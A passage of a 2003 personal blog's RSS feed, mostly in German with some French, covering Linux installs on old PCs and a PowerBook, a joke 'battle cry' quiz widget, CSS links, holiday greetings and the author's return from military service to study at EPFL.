  11884.    <content:encoded><![CDATA[Auf dem alten Pentium II meiner Eltern habe ich gestern <a href="https://web.archive.org/web/20031221090645/http://www.mandrake.com/"><b>Mandrake Linux 9.2</b></a> installiert.<br>Nun taucht plötzlich folgendes Problem auf: In X funktioniert die Maus nicht (/dev/psaux und /dev/mouse ist "busy") und das Netzwerk will auch nicht mehr. Wenn ich beim Booten das Starten des eth0-Interfaces überspringe, funktioniert die Maus, aber das Netzwerk will auch nach manuellem initialisieren nicht funktionieren.<br>Die Maus ist eine PS/2 Logitech, und die Netzwerkkarte eine ISA-3Com-3c509 (das entsprechende Kernelmodul lädt ohne Fehlermeldung oder ähnliches). Irgendwelche Ideen? Lösung?<br><br>Mandrake benutzt eine RPM-basierte Packetverwaltung. Defaultmässig sind dort nur die Pakete auffindbar, die auf der Installations-CD sind. Da ich aber nur die erste Installations-CD besitze, habe ich auf <a href="ftp://sunsite.cnlab-switch.ch/mirror/mandrake"><b>ftp://sunsite.cnlab-switch.ch/mirror/mandrake</b></a> ein bisschen rumgeschaut und die URLs und die hdlist.cz Dateien in die Mandrake-Paketverwaltung integriert, so dass ich Zugriff auf (alle?) Mandrake-Pakete habe. Jedoch habe ich auch dort einige Pakete nicht gefunden. So fehlen mir immernoch der Acrobat Reader und der Flashplayer etc. Weiss zufällugerweise jemand, wo ich diese finden kann?
  11885. ]]></content:encoded>
  11886.  </item>
  11887.  
  11888.  <item>
  11889.    <title>SwissBlogs</title>
  11890.    <link>https://blog.x-way.org/Misc/2003/12/28/SwissBlogs.html</link>
  11891.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323991</guid>
  11892.    <dc:creator>Andreas Jaggi</dc:creator>
  11893.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11894.    <pubDate>Sun, 28 Dec 2003 01:00:00 +0000</pubDate>
  11895.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  11896.    <description><![CDATA[<a href="https://web.archive.org/web/20031223044241/http://swissblogs.com/"><b>SwissBlogs.com</b></a> est une liste des weblogs suisses qui contient maintenant aussi mon weblog. ce truc est fondé par <a href="http://climbtothestars.org/"><b>Stephanie Booth</b></a>.
  11897. ]]></description>
  11898.    <content:encoded><![CDATA[<a href="https://web.archive.org/web/20031223044241/http://swissblogs.com/"><b>SwissBlogs.com</b></a> est une liste des weblogs suisses qui contient maintenant aussi mon weblog. ce truc est fondé par <a href="http://climbtothestars.org/"><b>Stephanie Booth</b></a>.
  11899. ]]></content:encoded>
  11900.  </item>
  11901.  
  11902.  <item>
  11903.    <title>46° 33' 18", 7° 22' 13"</title>
  11904.    <link>https://blog.x-way.org/Misc/2003/12/28/46_33_18_7_22_13.html</link>
  11905.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323990</guid>
  11906.    <dc:creator>Andreas Jaggi</dc:creator>
  11907.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11908.    <pubDate>Sun, 28 Dec 2003 00:30:00 +0000</pubDate>
  11909.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  11910.    <description><![CDATA[Dank <a href="https://web.archive.org/web/20031222194816/http://www.maporama.com/"><b>Maporama</b></a> weiss ich nun ungefähr meine Koordinaten und habe mich nun auch bei <a href="https://web.archive.org/web/20031219133926/http://www.geourl.com/"><b>GeoURL</b></a> eingetragen.<br><br> <a href="https://web.archive.org/web/20060207013719/http://geourl.org/near/?p=http://waterwave.ch/weblog" title="check out my neighbors in meatspace (archive.org)">
  11911. <img alt="GeoURL" src="https://blog.x-way.org/images/geourl.png" width="52" height="14">
  11912. </a>
  11913. ]]></description>
  11914.    <content:encoded><![CDATA[Dank <a href="https://web.archive.org/web/20031222194816/http://www.maporama.com/"><b>Maporama</b></a> weiss ich nun ungefähr meine Koordinaten und habe mich nun auch bei <a href="https://web.archive.org/web/20031219133926/http://www.geourl.com/"><b>GeoURL</b></a> eingetragen.<br><br> <a href="https://web.archive.org/web/20060207013719/http://geourl.org/near/?p=http://waterwave.ch/weblog" title="check out my neighbors in meatspace (archive.org)">
  11915. <img alt="GeoURL" src="https://blog.x-way.org/images/geourl.png" width="52" height="14">
  11916. </a>
  11917. ]]></content:encoded>
  11918.  </item>
  11919.  
  11920.  <item>
  11921.    <title>Comme chaque année</title>
  11922.    <link>https://blog.x-way.org/Misc/2003/12/24/Comme_chaque_annee.html</link>
  11923.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323989</guid>
  11924.    <dc:creator>Andreas Jaggi</dc:creator>
  11925.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11926.    <pubDate>Wed, 24 Dec 2003 16:13:00 +0000</pubDate>
  11927.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  11928.    <description><![CDATA[Bonnes fêtes
  11929. ]]></description>
  11930.    <content:encoded><![CDATA[Bonnes fêtes
  11931. ]]></content:encoded>
  11932.  </item>
  11933.  
  11934.  <item>
  11935.    <title>Alle Jahre wieder</title>
  11936.    <link>https://blog.x-way.org/Misc/2003/12/24/Alle_Jahre_wieder.html</link>
  11937.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323988</guid>
  11938.    <dc:creator>Andreas Jaggi</dc:creator>
  11939.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11940.    <pubDate>Wed, 24 Dec 2003 16:11:00 +0000</pubDate>
  11941.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  11942.    <description><![CDATA[Schöne Feiertage allerseits
  11943. ]]></description>
  11944.    <content:encoded><![CDATA[Schöne Feiertage allerseits
  11945. ]]></content:encoded>
  11946.  </item>
  11947.  
  11948.  <item>
  11949.    <title>Linux on Mac</title>
  11950.    <link>https://blog.x-way.org/Linux/2003/12/23/Linux_on_Mac.html</link>
  11951.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323987</guid>
  11952.    <dc:creator>Andreas Jaggi</dc:creator>
  11953.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11954.    <pubDate>Tue, 23 Dec 2003 00:25:00 +0000</pubDate>
  11955.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  11956.    <description><![CDATA[Beim dritten Anlauf ist es endlich gelungen: Linux läuft mit X und Sound auf dem PowerBook :-)<br>Als Distribution dient wieder <a href="http://www.gentoo.org/"><b>Gentoo</b></a>. Dank dem 2.6er-Kernel funktioniert der Sound mit ALSA nach einem insmod out of the box. Als WindowManager kommt <a href="http://kahakai.sourceforge.net/"><b>Kahakai</b></a>, ein Blackbox/Fluxbox/Waimea-Clone zum Einsatz; <a href="http://www.enlightenment.org"><b>Enlightenment</b></a>, <a href="https://www.nongnu.org/ratpoison/"><b>ratpoison</b></a>, <a href="https://www.6809.org.uk/evilwm/"><b>evilwm</b></a>, <a href="https://web.archive.org/web/20031205042507/http://modeemi.cs.tut.fi/~tuomov/pwm/"><b>pwm</b></a> und <a href="https://www.pekwm.se/"><b>pekwm</b></a> will ich aber auch noch ausprobieren.<br><br>Leider ist der WLAN-Chip der Airport Extreme-Karte von Broadcom, welche ja bekanntlich keine Treiber für Linux haben. Auch der Erfolg des <a href="http://ndiswrapper.sourceforge.net/"><b>NdisWrapper</b></a> bringt mich nicht weiter, da zwar der gleiche Chip in der Karte steckt jedoch der NdisWrapper nur auf x86 funktioniert :-(<br>Mal schauen ob ich noch das SuperDrive zum brennen kriege...<br><br><a href="https://blog.x-way.org/images/AquaLinux.jpg"><b>Aqua on Linux</b></a>
  11957. ]]></description>
  11958.    <content:encoded><![CDATA[Beim dritten Anlauf ist es endlich gelungen: Linux läuft mit X und Sound auf dem PowerBook :-)<br>Als Distribution dient wieder <a href="http://www.gentoo.org/"><b>Gentoo</b></a>. Dank dem 2.6er-Kernel funktioniert der Sound mit ALSA nach einem insmod out of the box. Als WindowManager kommt <a href="http://kahakai.sourceforge.net/"><b>Kahakai</b></a>, ein Blackbox/Fluxbox/Waimea-Clone zum Einsatz; <a href="http://www.enlightenment.org"><b>Enlightenment</b></a>, <a href="https://www.nongnu.org/ratpoison/"><b>ratpoison</b></a>, <a href="https://www.6809.org.uk/evilwm/"><b>evilwm</b></a>, <a href="https://web.archive.org/web/20031205042507/http://modeemi.cs.tut.fi/~tuomov/pwm/"><b>pwm</b></a> und <a href="https://www.pekwm.se/"><b>pekwm</b></a> will ich aber auch noch ausprobieren.<br><br>Leider ist der WLAN-Chip der Airport Extreme-Karte von Broadcom, welche ja bekanntlich keine Treiber für Linux haben. Auch der Erfolg des <a href="http://ndiswrapper.sourceforge.net/"><b>NdisWrapper</b></a> bringt mich nicht weiter, da zwar der gleiche Chip in der Karte steckt jedoch der NdisWrapper nur auf x86 funktioniert :-(<br>Mal schauen ob ich noch das SuperDrive zum brennen kriege...<br><br><a href="https://blog.x-way.org/images/AquaLinux.jpg"><b>Aqua on Linux</b></a>
  11959. ]]></content:encoded>
  11960.  </item>
  11961.  
  11962.  <item>
  11963.    <title>Battlecry</title>
  11964.    <link>https://blog.x-way.org/Misc/2003/12/10/Battlecry.html</link>
  11965.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323986</guid>
  11966.    <dc:creator>Andreas Jaggi</dc:creator>
  11967.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11968.    <pubDate>Wed, 10 Dec 2003 08:15:00 +0000</pubDate>
  11969.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  11970.    <description><![CDATA[<form action="http://bdmonkeys.net/~chaz/battle.php" method="get"><table style="text-align: center; width: 400px; border-spacing: 4px; border: 0"><tr><td style="background-color: black; text-align: center"><p style="color:red;font-family:'times new roman';font-size:16px;"><b>What Is Your Battle Cry?</b></p></td></tr><tr><td style="background-color: #ffbb77; text-align: center"><p style="margin:10px;font-family:'times new roman';font-size:16px;color:#000;"><span style="font-family: 'old english text mt','old english text'; font-size: 32px">P</span>rowling across the mini-mall parking lot, cutting down all who dare stand in the way using gilded boxing gloves, cometh <b>X-way</b>! And he gives a spectacular cry:</p><p style="margin:11px;font-family:'times new roman';font-size:18px;color:#000;"><b><i>"For the love of carnage and discord, I tear into the enemy until Satan himself emerges from the pit to thank me!"</i></b></p></td></tr><tr><td style="text-align: center; background-color: #aaaaaa"><p style="font-family:'times new roman';font-size:14px;color:#000;"><b>Find out!</b><br>Enter username: <input type="text" name="usrname" value="x-way"><br>Are you <input type="radio" name="sex" value="f">a girl, or <input type="radio" name="sex" value="m" checked="checked">a guy ?<br><input type="submit" value="Submit"></p></td></tr><tr><td style="background-color: black; text-align: center"><p style="color:red;font-family:'times new roman';font-size:12px;margin:0px;"><b>created by <a href="http://www.livejournal.com/users/beatings/"><span style="color: #cc00ff; font-family: 'times new roman'">beatings</span></a> </b>:<b> powered by <a href="http://www.bdmonkeys.net/"><span style="color: #cc00ff; font-family: 'times new roman'">monkeys</span></a></b></p></td></tr></table></form><br><br>Gefunden bei <a href="http://kniebes.com"><b>mk</b></a>
  11971. ]]></description>
  11972.    <content:encoded><![CDATA[<form action="http://bdmonkeys.net/~chaz/battle.php" method="get"><table style="text-align: center; width: 400px; border-spacing: 4px; border: 0"><tr><td style="background-color: black; text-align: center"><p style="color:red;font-family:'times new roman';font-size:16px;"><b>What Is Your Battle Cry?</b></p></td></tr><tr><td style="background-color: #ffbb77; text-align: center"><p style="margin:10px;font-family:'times new roman';font-size:16px;color:#000;"><span style="font-family: 'old english text mt','old english text'; font-size: 32px">P</span>rowling across the mini-mall parking lot, cutting down all who dare stand in the way using gilded boxing gloves, cometh <b>X-way</b>! And he gives a spectacular cry:</p><p style="margin:11px;font-family:'times new roman';font-size:18px;color:#000;"><b><i>"For the love of carnage and discord, I tear into the enemy until Satan himself emerges from the pit to thank me!"</i></b></p></td></tr><tr><td style="text-align: center; background-color: #aaaaaa"><p style="font-family:'times new roman';font-size:14px;color:#000;"><b>Find out!</b><br>Enter username: <input type="text" name="usrname" value="x-way"><br>Are you <input type="radio" name="sex" value="f">a girl, or <input type="radio" name="sex" value="m" checked="checked">a guy ?<br><input type="submit" value="Submit"></p></td></tr><tr><td style="background-color: black; text-align: center"><p style="color:red;font-family:'times new roman';font-size:12px;margin:0px;"><b>created by <a href="http://www.livejournal.com/users/beatings/"><span style="color: #cc00ff; font-family: 'times new roman'">beatings</span></a> </b>:<b> powered by <a href="http://www.bdmonkeys.net/"><span style="color: #cc00ff; font-family: 'times new roman'">monkeys</span></a></b></p></td></tr></table></form><br><br>Gefunden bei <a href="http://kniebes.com"><b>mk</b></a>
  11973. ]]></content:encoded>
  11974.  </item>
  11975.  
  11976.  <item>
  11977.    <title>Photo vom Panther</title>
  11978.    <link>https://blog.x-way.org/Linux/2003/12/06/Photo_vom_Panther.html</link>
  11979.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323985</guid>
  11980.    <dc:creator>Andreas Jaggi</dc:creator>
  11981.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11982.    <pubDate>Sat, 06 Dec 2003 01:14:00 +0000</pubDate>
  11983.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  11984.    <description><![CDATA[Ein <a href="https://blog.x-way.org/images/Mac-OS-X-Screenshot.jpg"><b>hübsches Bildchen</b></a> von meinem neuen Gerät:<br><a href="http://claws.sylpheed.org/"><b>Sylpheed</b></a> läuft auf einem anderen Rechner (nuntia) und die <a href="http://xfree86.org/"><b>X11</b></a>-Ausgabe wird via <a href="http://openssh.org/"><b>SSH</b></a> zum X11 vom Mac umgeleitet. Davor das Terminal mit der SSH-Session und das Terminal vom Mac. Dahinter noch <a href="http://www.apple.com/safari/"><b>Safari</b></a>, der <a href="https://web.archive.org/web/20040803004115/http://devel-home.kde.org/~danimo/apidocs/khtml/html/"><b>KHTML</b></a>-basierte Browser von <a href="http://www.apple.com"><b>Apple</b></a>. Zuunterst das "berühmte" Dock.<br><br>Und nun startet der Installationsversuch Nummer 2 von Linux. Diesmal mit einer seperaten /boot-Partition und vermutlich auch gerade Kernel 2.6...
  11985. ]]></description>
  11986.    <content:encoded><![CDATA[Ein <a href="https://blog.x-way.org/images/Mac-OS-X-Screenshot.jpg"><b>hübsches Bildchen</b></a> von meinem neuen Gerät:<br><a href="http://claws.sylpheed.org/"><b>Sylpheed</b></a> läuft auf einem anderen Rechner (nuntia) und die <a href="http://xfree86.org/"><b>X11</b></a>-Ausgabe wird via <a href="http://openssh.org/"><b>SSH</b></a> zum X11 vom Mac umgeleitet. Davor das Terminal mit der SSH-Session und das Terminal vom Mac. Dahinter noch <a href="http://www.apple.com/safari/"><b>Safari</b></a>, der <a href="https://web.archive.org/web/20040803004115/http://devel-home.kde.org/~danimo/apidocs/khtml/html/"><b>KHTML</b></a>-basierte Browser von <a href="http://www.apple.com"><b>Apple</b></a>. Zuunterst das "berühmte" Dock.<br><br>Und nun startet der Installationsversuch Nummer 2 von Linux. Diesmal mit einer seperaten /boot-Partition und vermutlich auch gerade Kernel 2.6...
  11987. ]]></content:encoded>
  11988.  </item>
  11989.  
  11990.  <item>
  11991.    <title>Wieder mal was zum Gentoo</title>
  11992.    <link>https://blog.x-way.org/Linux/2003/12/05/Wieder_mal_was_zum_Gentoo.html</link>
  11993.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323984</guid>
  11994.    <dc:creator>Andreas Jaggi</dc:creator>
  11995.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  11996.    <pubDate>Fri, 05 Dec 2003 12:03:00 +0000</pubDate>
  11997.    <category domain="https://blog.x-way.org/Linux">Linux</category>
  11998.    <description><![CDATA[<img alt="Gentoo Emerge Comic" src="https://blog.x-way.org/images/ecol-136-e.png"><br><br>Weitere solche Comics bei <a href="https://web.archive.org/web/20031201020330/http://comic.escomposlinux.org/"><b>es.comp.os.linux.*</b></a>
  11999. ]]></description>
  12000.    <content:encoded><![CDATA[<img alt="Gentoo Emerge Comic" src="https://blog.x-way.org/images/ecol-136-e.png"><br><br>Weitere solche Comics bei <a href="https://web.archive.org/web/20031201020330/http://comic.escomposlinux.org/"><b>es.comp.os.linux.*</b></a>
  12001. ]]></content:encoded>
  12002.  </item>
  12003.  
  12004.  <item>
  12005.    <title>argyraspides</title>
  12006.    <link>https://blog.x-way.org/Mac/2003/11/27/argyraspides.html</link>
  12007.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323983</guid>
  12008.    <dc:creator>Andreas Jaggi</dc:creator>
  12009.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12010.    <pubDate>Thu, 27 Nov 2003 09:52:00 +0000</pubDate>
  12011.    <category domain="https://blog.x-way.org/Mac">Mac</category>
  12012.    <description><![CDATA[Da sich nun der Adrelaninsturm ein bisschen gelegt hat, folgendes:<br>Seit gestern Mittag habe ich nun auch so einen tragbaren Computer, ein Apple PowerBook G4 15 Zoll mit Superdrive um etwas genauer zu sein.<br>Das GUI ist sehr schön, jedoch sehr oft nur eine Spielerei, die nicht wirklich nützlich ist.<br>Was mir gefällt ist, dass man mit Bluetooth fast ganz einfach die Adressdaten, Kalender etc. vom Natel zum Computer kopieren kann und umgekehrt.<br>Weitere Erfahrungsberichte werden sicher folgen :-)
  12013. ]]></description>
  12014.    <content:encoded><![CDATA[Da sich nun der Adrelaninsturm ein bisschen gelegt hat, folgendes:<br>Seit gestern Mittag habe ich nun auch so einen tragbaren Computer, ein Apple PowerBook G4 15 Zoll mit Superdrive um etwas genauer zu sein.<br>Das GUI ist sehr schön, jedoch sehr oft nur eine Spielerei, die nicht wirklich nützlich ist.<br>Was mir gefällt ist, dass man mit Bluetooth fast ganz einfach die Adressdaten, Kalender etc. vom Natel zum Computer kopieren kann und umgekehrt.<br>Weitere Erfahrungsberichte werden sicher folgen :-)
  12015. ]]></content:encoded>
  12016.  </item>
  12017.  
  12018.  <item>
  12019.    <title>Wochenende</title>
  12020.    <link>https://blog.x-way.org/Misc/2003/11/23/Wochenende.html</link>
  12021.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323982</guid>
  12022.    <dc:creator>Andreas Jaggi</dc:creator>
  12023.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12024.    <pubDate>Sun, 23 Nov 2003 12:02:00 +0000</pubDate>
  12025.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12026.    <description><![CDATA[Am Freitag war ich mit ein paar Kollegen von der <a href="http://www.epfl.ch"><b>EPFL</b></a> an der <b><a href="https://shortfilm.ch/evenements/nuit-du-court-de-lausanne/presentation">Nacht der Kurzfilme</a></b> in <a href="http://www.lausanne.ch/"><b>Lausanne</b></a>. Da liefen von 20 Uhr an ungefähr 50 Kurzfilme und um 5 Uhr am Morgen gabs für alle, die solange ausgeharrt hatten, noch Café &amp; Croissants.<br><br>Nach 2 Stunden Schlaf gings dann wieder auf, um den ganzen Tag am <a href="https://web.archive.org/web/20040115122633/http://gnugeneration.epfl.ch/installfests.html"><b>Installfest</b></a> der <a href="http://gnugeneration.epfl.ch"><b>GNU Generation</b></a> (Verein von Studenten der <a href="http://www.epfl.ch"><b>EPFL</b></a> zur Promotion von <a href="http://www.linux.org"><b>GNU/Linux</b></a> und <a href="http://www.gnu.org"><b>freier Software</b></a>) als <abbr title="Gentil Installateur = Netter Installateur">GI</abbr> mitzuhelfen; d.h. ganz vielen Leuten helfen GNU/Linux zu installieren und jenste Hardwareteile zum Funktionieren überreden.
  12027. ]]></description>
  12028.    <content:encoded><![CDATA[Am Freitag war ich mit ein paar Kollegen von der <a href="http://www.epfl.ch"><b>EPFL</b></a> an der <b><a href="https://shortfilm.ch/evenements/nuit-du-court-de-lausanne/presentation">Nacht der Kurzfilme</a></b> in <a href="http://www.lausanne.ch/"><b>Lausanne</b></a>. Da liefen von 20 Uhr an ungefähr 50 Kurzfilme und um 5 Uhr am Morgen gabs für alle, die solange ausgeharrt hatten, noch Café &amp; Croissants.<br><br>Nach 2 Stunden Schlaf gings dann wieder auf, um den ganzen Tag am <a href="https://web.archive.org/web/20040115122633/http://gnugeneration.epfl.ch/installfests.html"><b>Installfest</b></a> der <a href="http://gnugeneration.epfl.ch"><b>GNU Generation</b></a> (Verein von Studenten der <a href="http://www.epfl.ch"><b>EPFL</b></a> zur Promotion von <a href="http://www.linux.org"><b>GNU/Linux</b></a> und <a href="http://www.gnu.org"><b>freier Software</b></a>) als <abbr title="Gentil Installateur = Netter Installateur">GI</abbr> mitzuhelfen; d.h. ganz vielen Leuten helfen GNU/Linux zu installieren und jenste Hardwareteile zum Funktionieren überreden.
  12029. ]]></content:encoded>
  12030.  </item>
  12031.  
  12032.  <item>
  12033.    <title>Feines Dessert</title>
  12034.    <link>https://blog.x-way.org/Misc/2003/11/15/Feines_Dessert.html</link>
  12035.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323981</guid>
  12036.    <dc:creator>Andreas Jaggi</dc:creator>
  12037.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12038.    <pubDate>Sat, 15 Nov 2003 17:39:00 +0000</pubDate>
  12039.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12040.    <description><![CDATA[Gerade zum besten Desser erkohren:<br>Vermicelle mit Schockoladencrème und Schlagrahm<br>Einfach spitze :-)
  12041. ]]></description>
  12042.    <content:encoded><![CDATA[Gerade zum besten Desser erkohren:<br>Vermicelle mit Schockoladencrème und Schlagrahm<br>Einfach spitze :-)
  12043. ]]></content:encoded>
  12044.  </item>
  12045.  
  12046.  <item>
  12047.    <title>Shipped !!!</title>
  12048.    <link>https://blog.x-way.org/Misc/2003/11/14/Shipped_.html</link>
  12049.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323980</guid>
  12050.    <dc:creator>Andreas Jaggi</dc:creator>
  12051.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12052.    <pubDate>Fri, 14 Nov 2003 21:09:00 +0000</pubDate>
  12053.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12054.    <description><![CDATA[<img alt="Shipped" src="https://blog.x-way.org/images/shipped.png"><br><br>Endich! Am Abend des 13. Novembers durfte ich entdecken, dass mein Packet die Fabrik in Irland verlassen hat *freu*<br>Leider funktionieren die angegebenen Trackingnummern nicht :-(
  12055. ]]></description>
  12056.    <content:encoded><![CDATA[<img alt="Shipped" src="https://blog.x-way.org/images/shipped.png"><br><br>Endich! Am Abend des 13. Novembers durfte ich entdecken, dass mein Packet die Fabrik in Irland verlassen hat *freu*<br>Leider funktionieren die angegebenen Trackingnummern nicht :-(
  12057. ]]></content:encoded>
  12058.  </item>
  12059.  
  12060.  <item>
  12061.    <title>CSS Links</title>
  12062.    <link>https://blog.x-way.org/Webdesign/2003/11/08/CSS_Links.html</link>
  12063.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323979</guid>
  12064.    <dc:creator>Andreas Jaggi</dc:creator>
  12065.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12066.    <pubDate>Sat, 08 Nov 2003 17:42:00 +0000</pubDate>
  12067.    <category domain="https://blog.x-way.org/Webdesign">Webdesign</category>
  12068.    <description><![CDATA[Bei <a href="http://kniebes.net"><b>mk</b></a> ein paar (ältere) CSS Links gefunden:<br>
  12069. <a href="http://www.thenoodleincident.com/tutorials/box_lesson/boxes.html"><b>Little Boxes</b></a><br>
  12070. <a href="https://web.archive.org/web/20031204212446/http://css.maxdesign.com.au/index.htm"><b>CSS @ Maxdesign</b></a><br>
  12071. <a href="https://web.archive.org/web/20031106032608/http://www.phoenity.com/newtedge/horizontal_nav"><b>CSS horizontal navigation list</b></a><br>
  12072. <a href="https://web.archive.org/web/20031112094032/http://www.kommkonzept.de/extras/hover.html"><b>:hover mit beliebigen Elementen</b></a><br>
  12073. <a href="http://www.meyerweb.com/eric/css/edge/menus/demo.html"><b>pure CSS menus</b></a><br>
  12074. ]]></description>
  12075.    <content:encoded><![CDATA[Bei <a href="http://kniebes.net"><b>mk</b></a> ein paar (ältere) CSS Links gefunden:<br>
  12076. <a href="http://www.thenoodleincident.com/tutorials/box_lesson/boxes.html"><b>Little Boxes</b></a><br>
  12077. <a href="https://web.archive.org/web/20031204212446/http://css.maxdesign.com.au/index.htm"><b>CSS @ Maxdesign</b></a><br>
  12078. <a href="https://web.archive.org/web/20031106032608/http://www.phoenity.com/newtedge/horizontal_nav"><b>CSS horizontal navigation list</b></a><br>
  12079. <a href="https://web.archive.org/web/20031112094032/http://www.kommkonzept.de/extras/hover.html"><b>:hover mit beliebigen Elementen</b></a><br>
  12080. <a href="http://www.meyerweb.com/eric/css/edge/menus/demo.html"><b>pure CSS menus</b></a><br>
  12081. ]]></content:encoded>
  12082.  </item>
  12083.  
  12084.  <item>
  12085.    <title>Weltweites Warten</title>
  12086.    <link>https://blog.x-way.org/Misc/2003/11/08/Weltweites_Warten.html</link>
  12087.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323978</guid>
  12088.    <dc:creator>Andreas Jaggi</dc:creator>
  12089.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12090.    <pubDate>Sat, 08 Nov 2003 02:34:00 +0000</pubDate>
  12091.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12092.    <description><![CDATA[Bestellungen über das <abbr title="World Wide Web">WWW</abbr> sind in der Regel innert ein paar Tagen da. Jedoch diese Bestellung lässt auf sich warten: Nun sind schon fast zwei Wochen vergangen und es ist immernoch das gleiche Bild:<br><br><img src="https://blog.x-way.org/images/beingassembled.png" width="477" height="132" alt="Being Assembled">
  12093. ]]></description>
  12094.    <content:encoded><![CDATA[Bestellungen über das <abbr title="World Wide Web">WWW</abbr> sind in der Regel innert ein paar Tagen da. Jedoch diese Bestellung lässt auf sich warten: Nun sind schon fast zwei Wochen vergangen und es ist immernoch das gleiche Bild:<br><br><img src="https://blog.x-way.org/images/beingassembled.png" width="477" height="132" alt="Being Assembled">
  12095. ]]></content:encoded>
  12096.  </item>
  12097.  
  12098.  <item>
  12099.    <title>Zurück im Zivilleben</title>
  12100.    <link>https://blog.x-way.org/Misc/2003/11/02/Zurueck_im_Zivilleben.html</link>
  12101.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323977</guid>
  12102.    <dc:creator>Andreas Jaggi</dc:creator>
  12103.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12104.    <pubDate>Sun, 02 Nov 2003 10:51:00 +0000</pubDate>
  12105.    <category domain="https://blog.x-way.org/Misc">Misc</category>
  12106.    <description><![CDATA[Nun ist für eine (hoffentlich) lange Zeit fertig mit <a href="https://blog.x-way.org/images/CIMG0528.JPG"><b>solchen</b></a> <a href="https://blog.x-way.org/images/CIMG0527.JPG"><b>komischen</b></a> <a href="https://blog.x-way.org/images/CIMG0179.JPG"><b>Verkleidungen</b></a>; die 15 Wochen <abbr title="Rekrutenschule = Obligatorische militärische Grundausbildung in der Schweiz">RS</abbr> sind vorbei.<br><br>Während der RS sah ich <a href="https://blog.x-way.org/images/DSC00169.JPG"><b>so</b></a> aus, nach der RS wieder <a href="https://blog.x-way.org/images/DSC00170.JPG"><b>so</b></a> (natürlich ohne das grüne Faschingskostüm) und in der letzten Woche <a href="https://blog.x-way.org/images/DSC00168.JPG"><b>so</b></a>, was jedoch meinen Vorgesetzten nicht so gefiel und daher nur einen halben Tag lang dauerte :-)<br><br>Und nun studiere ich an der <a href="http://www.epfl.ch"><b>EPFL</b></a> bis auf weiteres Informatik.
  12107. ]]></description>
  12108.    <content:encoded><![CDATA[Nun ist für eine (hoffentlich) lange Zeit fertig mit <a href="https://blog.x-way.org/images/CIMG0528.JPG"><b>solchen</b></a> <a href="https://blog.x-way.org/images/CIMG0527.JPG"><b>komischen</b></a> <a href="https://blog.x-way.org/images/CIMG0179.JPG"><b>Verkleidungen</b></a>; die 15 Wochen <abbr title="Rekrutenschule = Obligatorische militärische Grundausbildung in der Schweiz">RS</abbr> sind vorbei.<br><br>Während der RS sah ich <a href="https://blog.x-way.org/images/DSC00169.JPG"><b>so</b></a> aus, nach der RS wieder <a href="https://blog.x-way.org/images/DSC00170.JPG"><b>so</b></a> (natürlich ohne das grüne Faschingskostüm) und in der letzten Woche <a href="https://blog.x-way.org/images/DSC00168.JPG"><b>so</b></a>, was jedoch meinen Vorgesetzten nicht so gefiel und daher nur einen halben Tag lang dauerte :-)<br><br>Und nun studiere ich an der <a href="http://www.epfl.ch"><b>EPFL</b></a> bis auf weiteres Informatik.
  12109. ]]></content:encoded>
  12110.  </item>
  12111.  
  12112.  <item>
  12113.    <title>Journée d'acceuil</title>
  12114.    <link>https://blog.x-way.org/School/2003/10/18/Journee_dacceuil.html</link>
  12115.    <guid isPermaLink="true">http://waterwave.ch/weblog/detail.php?id=323976</guid>
  12116.    <dc:creator>Andreas Jaggi</dc:creator>
  12117.    <creativeCommons:license>http://creativecommons.org/licenses/by-nd-nc/1.0/</creativeCommons:license>
  12118.    <pubDate>Sat, 18 Oct 2003 22:29:00 +0000</pubDate>
  12119.    <category domain="https://blog.x-way.org/School">School</category>
